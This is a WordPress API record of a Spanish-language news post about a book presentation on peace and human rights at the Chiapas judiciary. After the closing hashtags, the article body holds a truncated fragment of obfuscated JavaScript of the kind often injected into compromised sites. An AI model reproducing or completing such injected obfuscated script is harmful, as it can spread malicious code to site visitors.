{"id":21528,"date":"2025-04-22T03:28:32","date_gmt":"2025-04-22T03:28:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21528"},"modified":"2025-04-22T03:28:33","modified_gmt":"2025-04-22T03:28:33","slug":"se-presenta-el-libro-la-paz-como-derecho-humano-en-el-poder-judicial","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21528","title":{"rendered":"Se presenta el libro &#8220;La Paz como Derecho Humano&#8221; en el Poder Judicial"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"574\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250421-WA0058-1024x574.jpg\" alt=\"\" class=\"wp-image-21529\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250421-WA0058-1024x574.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250421-WA0058-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250421-WA0058-768x430.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250421-WA0058.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-El presidente Juan Carlos Moreno Guill\u00e9n present\u00f3 la obra de la autor\u00eda del fiscal Jorge Luis Llaven Abarca.<\/p>\n\n\n\n<p>En el arranque de la 1\u00aa Feria del Libro \u201cLa Justicia es la Paz\u201d, realizada en esta casa de la justicia, se realiz\u00f3 la presentaci\u00f3n del libro \u201cLa Paz como Derecho Humano\u201d, obra del fiscal general del Estado, Jorge Luis Llaven Abarca.<\/p>\n\n\n\n<p>En este evento, el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, realiz\u00f3 la presentaci\u00f3n de esta obra, en la que reconoci\u00f3 el trabajo de Llaven Abarca, y destac\u00f3 este libro como una lectura que conlleva a la reflexi\u00f3n jur\u00eddica y social, y al an\u00e1lisis del papel de las instituciones en la promoci\u00f3n de una paz duradera y con enfoque de derechos humanos.<\/p>\n\n\n\n<p>\u201cEste interesante libro, con el que se da inicio a nuestra 1\u00aa Feria del Libro, es un tema que va a fin a nuestro compromiso con la campa\u00f1a de \u201cLa justicia es la paz\u201d, marca ideas y estrategias que todas y todos los que trabajamos por ese objetivo deber\u00edamos de conocer\u201d, manifest\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Por su parte, la directora de Igualdad de G\u00e9nero y Derechos Humanos, Margarita Esther L\u00f3pez Morales, ofreci\u00f3 las palabras de bienvenida y present\u00f3 al autor, resaltando su trayectoria tanto en la administraci\u00f3n p\u00fablica como en la producci\u00f3n literaria, desde su compromiso de abonar en la construcci\u00f3n de una sociedad m\u00e1s justa y pac\u00edfica, con perspectiva de g\u00e9nero y derechos humanos.<\/p>\n\n\n\n<p>Durante su mensaje, el autor de la obra, el fiscal Llaven Abarca, relat\u00f3 y describi\u00f3 las particularidades y generalidades que abarcan este libro, en el que destac\u00f3 los conceptos de los tipos de paz, y las actuaciones que esta administraci\u00f3n ha implementado con el objetivo de tener en nuestro Chiapas una paz positiva.<\/p>\n\n\n\n<p>Adem\u00e1s, subray\u00f3 que el esfuerzo institucional ha sido clave en los primeros 100 d\u00edas de actividades para lograr los objetivos que se han planteado en nuestra entidad y recuperar la tranquilidad y la paz en los hogares, con programas como el de \u201ccero impunidad.\u201d<\/p>\n\n\n\n<p>En esta presentaci\u00f3n estuvieron presentes: la directora general de Coneculta Chiapas, Ang\u00e9lica Altuzar Constantino; magistradas y magistrados, juezas y jueces, y administrativos de este Poder Judicial, as\u00ed como personalidades de la Fiscal\u00eda General del Estado.<\/p>\n\n\n\n<p>#JusticiaconHumanismo #LaJusticiaeslaPaz #LaNuevaEraDeLaJusticia #PJEChiapas #200A\u00f1osPJEChiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-El presidente Juan Carlos Moreno Guill\u00e9n present\u00f3 la obra de la autor\u00eda del fiscal Jorge Luis Llaven Abarca. En el arranque de la 1\u00aa Feria del Libro \u201cLa Justicia es la Paz\u201d, realizada en esta casa de la justicia, se realiz\u00f3 la presentaci\u00f3n del libro \u201cLa Paz como Derecho Humano\u201d, obra del fiscal general del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21529,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21528","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21528"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21528\/revisions"}],"predecessor-version":[{"id":21530,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21528\/revisions\/21530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21529"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}